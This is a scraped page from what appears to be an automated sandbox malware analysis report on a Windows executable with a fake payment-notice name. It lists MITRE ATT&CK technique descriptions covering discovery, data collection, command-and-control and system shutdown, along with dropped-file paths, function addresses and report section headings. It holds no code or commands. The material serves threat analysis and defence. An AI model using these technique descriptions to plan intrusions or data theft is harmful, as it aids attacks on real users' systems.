Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\78-E5648

C:\Users\user\AppData\Local\Temp\Sheitan

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Windows Analysis Report
Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe

Function 008E42DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Function 008E42A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Function 00922BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Function 008E2CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Function 0092065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Function 008E344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 008E2B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Function 008E3170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Function 041BF860 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 008E2C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 041BF620 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 148
fileCOMMON

Function 008E3B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Function 041BE510 Relevance: 6.7, APIs: 4, Instructions: 720
processthreadCOMMON

Function 008E3923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94
windowCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre